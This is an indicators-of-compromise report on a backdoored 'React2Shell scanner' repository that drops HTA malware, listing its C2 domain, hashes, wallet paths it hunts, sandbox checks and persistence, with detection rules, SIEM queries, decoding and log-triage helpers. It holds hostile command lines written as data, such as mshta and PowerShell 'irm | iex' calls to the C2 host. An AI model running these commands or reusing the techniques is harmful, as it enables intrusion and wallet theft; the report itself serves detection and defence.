IOCs.txt
================================================================================
INDICATORS OF COMPROMISE (IOCs)
React2Shell Scanner Malware Analysis
================================================================================
Date: December 9, 2025
SHA256: 915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
VirusTotal: https://www.virustotal.com/gui/file/915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
================================================================================
1. NETWORK INDICATORS
================================================================================
1.1 Command & Control Infrastructure
------------------------------------
Domain: py-installer.cc
IPv4 Addresses:
- 172.67.219.119
- 104.21.53.225
IPv6 Addresses:
- 2606:4700:3033::6815:35e1
- 2606:4700:3034::ac43:db77
Protection: Cloudflare CDN
Certificate: Google Trust Services (expires Feb 21, 2026)
1.2 C2 Endpoints
----------------
https://py-installer.cc/
https://py-installer.cc/connect?hwid=
https://py-installer.cc/getModule?name=
https://py-installer.cc/getPsModule@
https://py-installer.cc/approveUpdate?id=
https://py-installer.cc/checkStatus
1.3 HTTP Headers
----------------
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0)
Content-Type: application/hta
Content-Disposition: attachment; filename=Python2.hta; filename*=UTF-8''Python2.hta
Authorization: Bearer <JWT_TOKEN>
1.4 HTTP Request Parameters
---------------------------
hwid=<hardware_id>
os=<operating_system>
av=<antivirus_products>
username=<username>
corp=<corporate_info>
domain=<domain_name>
version=<os_version>
key=<encryption_key>
ledger=<ledger_wallet_detection>
wallets=<other_wallet_detection>
task=<task_id>
1.5 HTTP Methods
----------------
POST (for C2 communication)
GET (for malware download)
================================================================================
2. FILE INDICATORS
================================================================================
2.1 Malware Files
-----------------
Filename: Python2.hta (downloaded name)
SHA256: 915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
MD5: 635dd3d016c76f5c0329d3fcfd3c2005
Size: 88,686 bytes
Type: HTML Application (HTA)
MalShare: https://malshare.com/sample.php?action=detail&hash=915f6e13af630895c22a85df0359da4e4741dca017e1892d16ecc46b40afbe03
2.2 File Locations
------------------
%userprofile%\
%LOCALAPPDATA%\
%APPDATA%\
%ProgramFiles%\
%ProgramData%\
Removable drives (USB propagation)
2.3 File Extensions Targeted for Propagation
---------------------------------------------
.docx (Microsoft Word documents)
.pdf (PDF documents)
.doc (Legacy Word documents)
2.4 Malicious Shortcuts Created
--------------------------------
Extension: .lnk
Target: mshta.exe https://py-installer.cc
Location: Removable drives (USB)
Icon: Extracted from original file or system default
================================================================================
3. PROCESS INDICATORS
================================================================================
3.1 Process Execution Patterns
------------------------------
mshta.exe https://py-installer.cc
powershell.exe -ep Bypass -nop -Command "irm <URL> | iex"
bitsadmin.exe /transfer "<task>" /download /priority foreground "<URL>" "<path>"
certutil.exe -urlcache -split -f "<URL>" "<path>"
rundll32.exe "<dll_path>",<entry_point>
msiexec.exe /i "<path>" /quiet /qn
3.2 Process Names
----------------
mshta.exe
powershell.exe
bitsadmin.exe
certutil.exe
rundll32.exe
msiexec.exe
================================================================================
4. REGISTRY INDICATORS
================================================================================
4.1 Registry Keys Accessed
---------------------------
HKEY_CLASSES_ROOT\<extension>\DefaultIcon\
HKEY_CLASSES_ROOT\<extension>\
4.2 Registry Operations
------------------------
Read operations for file association icons
Read operations for extension handlers
================================================================================
5. SCHEDULED TASK INDICATORS
================================================================================
5.1 Task Naming Pattern
-----------------------
NVIDIA App SelfUpdate_<HWID>
Where <HWID> is a hardware identifier (UUID format)
5.2 Task Intervals
-----------------
PT30M (30 minutes)
PT10M (10 minutes)
P3650D (10 years)
5.3 Task Service
----------------
Schedule.Service (Windows Task Scheduler)
================================================================================
6. WMI QUERY INDICATORS
================================================================================
6.1 WMI Namespaces Queried
--------------------------
root\cimv2
root\SecurityCenter2
root\CIMV2
root\default
6.2 WMI Classes Queried
-----------------------
Win32_Processor
Win32_ComputerSystemProduct
Win32_DiskDrive
Win32_OperatingSystem
Win32_ComputerSystem
AntiVirusProduct
Win32_Process
Win32_LogicalDisk
Win32_DiskPartition
6.3 Specific WMI Queries
------------------------
SELECT ProcessorId FROM Win32_Processor
SELECT UUID FROM Win32_ComputerSystemProduct
SELECT SerialNumber FROM Win32_DiskDrive
SELECT Model FROM Win32_DiskDrive
SELECT Caption, Version, ProductType FROM Win32_OperatingSystem
SELECT displayName FROM AntiVirusProduct
SELECT PartOfDomain FROM Win32_ComputerSystem
SELECT Domain, PartOfDomain FROM Win32_ComputerSystem
SELECT Name FROM Win32_Process
SELECT DeviceID,Index,Model,MediaType,InterfaceType,PNPDeviceID FROM Win32_DiskDrive
SELECT DeviceID FROM Win32_DiskPartition WHERE DiskIndex=
SELECT DeviceID,DriveType FROM Win32_LogicalDisk WHERE DriveType=2
================================================================================
7. BEHAVIORAL INDICATORS
================================================================================
7.1 System Information Collection
-----------------------------------
- Hardware identifiers (ProcessorId, UUID, SerialNumber, Model)
- Operating system version and architecture
- Domain membership status
- Installed antivirus products
- Username and computer name
- Environment variables (PROCESSOR_ARCHITECTURE, PROCESSOR_ARCHITEW6432)
7.2 Cryptocurrency Wallet Detection
------------------------------------
Targeted wallet paths:
%ProgramFiles%\Ledger Live
%ProgramFiles(x86)%\Ledger Live
%ProgramFiles%\Programs\ledger-live
%APPDATA%\@trezor
%APPDATA%\atomic
%APPDATA%\Exodus
%APPDATA%\Guarda
%APPDATA%\KeepKey
%APPDATA%\BitBox02
7.3 Sandbox Evasion Indicators
-------------------------------
Username checks for: AZURE-PC, Bruno
System account checks: SYSTEM, СИСТЕМА
Antivirus detection: Falcon, csfalconservice
Environment variable checks
Domain membership verification
7.4 USB Propagation Indicators
------------------------------
- Enumeration of removable drives (DriveType=2)
- Scanning for .docx, .pdf, .doc files
- Creation of .lnk shortcuts
- Setting hidden attributes on original files
- Shortcut target: mshta.exe with C2 URL
================================================================================
8. CODE INDICATORS
================================================================================
8.1 Obfuscation Characteristics
--------------------------------
XOR cipher with key: 112
Function name: _stateProxy
Array name: executeModule
String decryption pattern: String.fromCharCode(data[i] ^ key)
8.2 Key Strings (Decrypted)
----------------------------
py-installer.cc
connect?hwid=
getModule?name=
getPsModule@
approveUpdate?id=
NVIDIA App SelfUpdate_
Ledger Live
@trezor
atomic
Exodus
Guarda
KeepKey
BitBox02
WbemScripting.SWbemLocator
Schedule.Service
WinHttp.WinHttpRequest.5.1
MSXML2.XMLHTTP
ADODB.Stream
8.3 ActiveX Objects Used
------------------------
WScript.Shell
Scripting.FileSystemObject
WScript.Network
ActiveXObject
WinHttp.WinHttpRequest.5.1
MSXML2.XMLHTTP
ADODB.Stream
Shell.Application
Schedule.Service
WbemScripting.SWbemLocator
MSScriptControl.ScriptControl
================================================================================
9. SOURCE CODE INDICATORS (Backdoor in react2shell.py.py)
================================================================================
9.1 Function Name
-----------------
_initialize_runtime_environment()
9.2 Hex Encoded Strings
------------------------
6d73687461 → mshta
2e657865 → .exe
68747470733a2f2f → https://
70792d696e7374616c6c65722e6363 → py-installer.cc
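The two string-hiding schemes listed in 8.1 and 9.2 (single-byte XOR with key 112 rendered through String.fromCharCode, and plain hex encoding), reproduced as an added analyst helper that is not part of this report or of the analysed sample. The sample arrays below are constructed by re-encoding strings the report already lists; the crib-based key recovery generalises the fixed key 112 to any single-byte XOR key.

```python
# Added example (not from the IOC report or the analysed HTA): recover strings
# hidden by the single-byte XOR scheme (section 8.1) and the hex scheme (9.2).
from typing import Iterable, Optional

XOR_KEY = 112  # key reported in section 8.1

def xor_decode(data: Iterable[int], key: int = XOR_KEY) -> str:
    """Equivalent of String.fromCharCode(data[i] ^ key) over the whole array."""
    return "".join(chr(b ^ key) for b in data)

def hex_decode(hexstr: str) -> str:
    """Decode the hex-string form used by the Python backdoor (section 9.2)."""
    return bytes.fromhex(hexstr).decode("ascii")

def recover_xor_key(data: Iterable[int], crib: str) -> Optional[int]:
    """Single-byte XOR: try all 256 keys and return the one whose output
    contains a known string such as the C2 domain. Generalises the report's
    fixed key 112 to an unknown-key sample."""
    arr = list(data)
    for key in range(256):
        if crib in xor_decode(arr, key):
            return key
    return None

# Constructed sample input: strings from section 8.2 re-encoded with key 112
SAMPLE_ARRAY = [c ^ XOR_KEY for c in b"py-installer.cc/connect?hwid="]
SAMPLE_HEX = "6d73687461" + "2e657865"  # "mshta" + ".exe" from section 9.2

if __name__ == "__main__":
    print(xor_decode(SAMPLE_ARRAY))                         # py-installer.cc/connect?hwid=
    print(hex_decode(SAMPLE_HEX))                           # mshta.exe
    print(recover_xor_key(SAMPLE_ARRAY, "py-installer.cc"))  # 112
```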
9.3 Execution Command
----------------------
mshta.exe https://py-installer.cc
9.4 Source Repository
---------------------
https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
Archive: https://web.archive.org/web/20251209081236/https://github.com/niha0wa/React2shell-scanner/blob/main/react2shell.py.py
================================================================================
10. DETECTION RULES
================================================================================
Detection rules are available in the rules/ directory:
10.1 YARA RULES
---------------
- rules/react2shell_backdoor.yar - Detects React2Shell scanner backdoor in Python files
- rules/hta_malware_pyinstaller.yar - Detects HTA malware from py-installer.cc C2 server
Usage:
yara rules/react2shell_backdoor.yar <file>
yara rules/hta_malware_pyinstaller.yar <file>
10.2 SIGMA RULES
----------------
- rules/sigma_react2shell_backdoor.yml - Detects mshta.exe execution with py-installer.cc
- rules/sigma_react2shell_c2_network.yml - Detects network connections to C2 infrastructure
- rules/sigma_react2shell_c2_endpoints.yml - Detects HTTP requests to C2 endpoints
- rules/sigma_react2shell_scheduled_task.yml - Detects suspicious scheduled task creation
- rules/sigma_react2shell_python_backdoor.yml - Detects Python backdoor function execution
- rules/sigma_react2shell_wmi_persistence.yml - Detects WMI event subscription persistence
Usage:
sigmac -t <siem_type> rules/sigma_react2shell_backdoor.yml
# Supported SIEM types: splunk, elastic, qradar, arcsight, etc.
================================================================================
11. SNORT/SURICATA RULES
================================================================================
alert http any any -> any any (msg:"React2Shell Malware C2 Communication";
flow:established,to_server;
http.host; content:"py-installer.cc";
http.uri; content:"hwid=";
http.header; content:"Authorization|3a 20|Bearer";
sid:1000001;
rev:1;)
alert http any any -> any any (msg:"React2Shell Malware Download";
flow:established,to_server;
http.host; content:"py-installer.cc";
http.user_agent; content:"MSIE 7.0"; content:"Windows NT 10.0";
sid:1000002;
rev:1;)
================================================================================
12. SIEM QUERIES
================================================================================
12.1 Splunk Query
-----------------
index=* (process_name="mshta.exe" AND command_line="*py-installer.cc*")
OR (process_name="powershell.exe" AND command_line="*irm*py-installer.cc*")
OR (dns_query="py-installer.cc")
OR (http_url="*py-installer.cc*")
12.2 Elasticsearch Query
-------------------------
{
  "query": {
    "bool": {
      "should": [
        {"bool": {"must": [
          {"term": {"process.name": "mshta.exe"}},
          {"wildcard": {"process.command_line": "*py-installer.cc*"}}
        ]}},
        {"term": {"dns.question.name": "py-installer.cc"}},
        {"term": {"url.domain": "py-installer.cc"}}
      ],
      "minimum_should_match": 1
    }
  }
}
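The process patterns of 3.1, the task-name pattern of 5.1 and the Splunk logic of 12.1, encoded as an added host-log triage function. This is example code, not one of the report's rules/ files; the events it runs over are constructed samples, not real telemetry.

```python
# Added example (not from the IOC report or its rules/ directory): triage of
# process-creation and scheduled-task events against sections 3.1, 5.1, 12.1.
import re
from typing import Dict, List

C2_DOMAIN = "py-installer.cc"
UUID_RE = r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"

# (rule name, process name, regex over the command line), mirroring 3.1 / 12.1
PROCESS_RULES = [
    ("mshta_remote_c2",    "mshta.exe",      re.compile(re.escape(C2_DOMAIN), re.I)),
    ("powershell_irm_iex", "powershell.exe", re.compile(r"-ep\s+bypass.*\birm\b.*\biex\b", re.I)),
    ("bitsadmin_download", "bitsadmin.exe",  re.compile(r"/transfer\b.*/download\b.*https?://", re.I)),
    ("certutil_urlcache",  "certutil.exe",   re.compile(r"-urlcache\b.*\s-f\s", re.I)),
]
# Persistence task name from 5.1: "NVIDIA App SelfUpdate_<HWID>" with a UUID
TASK_NAME_RE = re.compile(r"^NVIDIA App SelfUpdate_" + UUID_RE + r"$")

def triage_event(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list = clean)."""
    hits: List[str] = []
    if event.get("event") == "process_create":
        name = event.get("process_name", "").lower()
        cmd = event.get("command_line", "")
        for rule, proc, pattern in PROCESS_RULES:
            if name == proc and pattern.search(cmd):
                hits.append(rule)
    elif event.get("event") == "scheduled_task_create":
        if TASK_NAME_RE.match(event.get("task_name", "")):
            hits.append("nvidia_selfupdate_task_name")
    return hits

# Constructed sample events (not real telemetry); the third one is benign
SAMPLE_EVENTS = [
    {"event": "process_create", "process_name": "mshta.exe",
     "command_line": "mshta.exe https://py-installer.cc"},
    {"event": "process_create", "process_name": "powershell.exe",
     "command_line": 'powershell.exe -ep Bypass -nop -Command "irm https://py-installer.cc/x | iex"'},
    {"event": "process_create", "process_name": "certutil.exe",
     "command_line": "certutil.exe -hashfile C:\\tools\\setup.msi SHA256"},
    {"event": "scheduled_task_create",
     "task_name": "NVIDIA App SelfUpdate_123e4567-e89b-12d3-a456-426614174000"},
]

def triage_all(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> matched rule names, for a batch of events."""
    return {i: triage_event(e) for i, e in enumerate(events)}

if __name__ == "__main__":
    for i, hits in triage_all(SAMPLE_EVENTS).items():
        print(i, hits or "clean")
```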
================================================================================
13. MITRE ATT&CK MAPPING
================================================================================
T1566.001 - Phishing: Spearphishing Attachment (Supply chain attack)
T1059.001 - Command and Scripting Interpreter: PowerShell
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
T1105 - Ingress Tool Transfer
T1071.001 - Application Layer Protocol: Web Protocols
T1083 - File and Directory Discovery
T1082 - System Information Discovery
T1012 - Query Registry
T1057 - Process Discovery
T1041 - Exfiltration Over C2 Channel
T1021.002 - Remote Services: SMB/Windows Admin Shares (USB propagation)
T1053.005 - Scheduled Task/Job: Scheduled Task
T1074.001 - Data Staged: Local Data Staging
T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion
T1497.001 - Virtualization/Sandbox Evasion: System Checks
T1560.001 - Archive Collected Data: Archive via Utility
T1574.002 - Hijack Execution Flow: DLL Side-Loading (rundll32)
================================================================================
14. RECOMMENDED BLOCKING ACTIONS
================================================================================
14.1 DNS Blocking
----------------
Block domain: py-installer.cc
Block IPs: 172.67.219.119, 104.21.53.225
14.2 Firewall Rules
-------------------
Block outbound connections to py-installer.cc
Block outbound connections to IPs: 172.67.219.119, 104.21.53.225
14.3 Process Blocking
---------------------
Alert on mshta.exe execution with remote URLs
Monitor for powershell.exe -ep Bypass
Alert on bitsadmin.exe /transfer to external domains
Monitor certutil.exe -urlcache usage
14.4 File System Monitoring
---------------------------
Alert on .lnk file creation on removable drives
Monitor for hidden file attribute changes
Alert on HTA file execution
================================================================================
END OF IOCs
================================================================================